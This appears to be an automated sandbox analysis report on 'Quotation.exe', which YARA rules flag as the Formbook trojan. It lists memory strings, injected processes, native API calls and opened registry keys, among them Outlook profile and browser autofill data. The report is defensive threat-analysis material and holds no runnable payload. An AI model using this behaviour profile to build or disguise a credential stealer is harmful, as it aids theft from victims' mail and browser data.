        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ
        Source: control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
        Source: control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
        Source: control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Initial sample is a PE file and has a suspicious name
        Source: initial sampleStatic PE information: Filename: Quotation.exe
        Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2836 -s 284
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00406666
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_6D261A98
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_04F87412
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354E310
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FF330
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33531380
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F124C
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352D2EC
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3358717A
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DD130
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360010E
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335451C0
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EE076
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354B0D0
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F70F1
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3357508C
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335300A0
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F6757
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33542760
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354A760
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335ED646
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33564670
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355C600
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DD62C
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FA6C0
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FF6F6
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353C6E0
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B36EC
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360A526
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FF5C9
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F75C6
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540445
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540B10
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3357DB19
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FFB2E
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B4BC0
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FEA5B
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FCA13
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FFA89
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335859C0
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353E9A0
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FE9A6
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33549870
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B870
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FF872
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33526868
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356E810
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33543800
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335E0835
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F18DA
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335428C0
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33556882
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FFF63
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354CF00
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F1FC6
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33546FE0
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FEFBF
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33560E50
        Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 3352B910 appears 190 times
        Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 33587BE4 appears 74 times
        Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 335AE692 appears 69 times
        Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 335BEF10 appears 71 times
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335734E0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572B10 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572BC0 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572B90 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335729F0 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572F00 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572E50 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572ED0 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572EB0 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572D10 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572DA0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572C50 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572C30 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572CF0 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33574260 NtSetContextThread,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33574570 NtSuspendThread,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572B00 NtQueryValueKey,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572B20 NtQueryInformationProcess,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572BE0 NtQueryVirtualMemory,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572B80 NtCreateKey,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572A10 NtWriteFile,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572AC0 NtEnumerateValueKey,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572A80 NtClose,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572AA0 NtQueryInformationFile,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335729D0 NtWaitForSingleObject,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335738D0 NtGetContextThread,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572F30 NtOpenDirectoryObject,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572FB0 NtSetValueKey,
        Source: System.dll0.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: System.Security.Cryptography.X509Certificates.dll.1.drStatic PE information: No import functions for PE file found
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemaintenanceservice.exe0 vs Quotation.exe
        Source: Quotation.exe, 00000001.00000002.21944394921.0000000000436000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs Quotation.exe
        Source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.X509Certificates.dll@ vs Quotation.exe
        Source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dll@ vs Quotation.exe
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolutionExplorerCLI.dll vs Quotation.exe
        Source: Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepkcs11-helper-1.dll" vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000003.22626322501.00000000332CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000000.21846769970.0000000000436000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000002.22757544824.0000000002F8C000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000003.22633102338.000000003347F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000002.22771863781.00000000337D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs Quotation.exe
        Source: Quotation.exeBinary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs Quotation.exe
        Source: C:\Users\user\Desktop\Quotation.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\Quotation.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\control.exeSection loaded: edgegdi.dll
        Source: Quotation.exeStatic PE information: invalid certificate
        Source: percentile.dll.1.drStatic PE information: Number of sections : 19 > 10
        Source: libdatrie-1.dll.1.drStatic PE information: Number of sections : 11 > 10
        Source: libpkcs11-helper-1.dll.1.drStatic PE information: Number of sections : 12 > 10
        Source: Quotation.exeVirustotal: Detection: 18%
        Source: Quotation.exeReversingLabs: Detection: 25%
        Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\user\Desktop\Quotation.exeJump to behavior
        Source: Quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe
        Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
        Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2836 -s 284
        Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
        Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
        Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\GhettoJump to behavior
        Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsmFC66.tmpJump to behavior
        Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@11/11@18/15
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00402138 CoCreateInstance,MultiByteToWideChar,
        Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_004044FA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
        Source: 4995H5Jfc.13.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.dll0.1.dr
        Source: Binary string: maintenanceservice.pdb@ 0%P% source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr
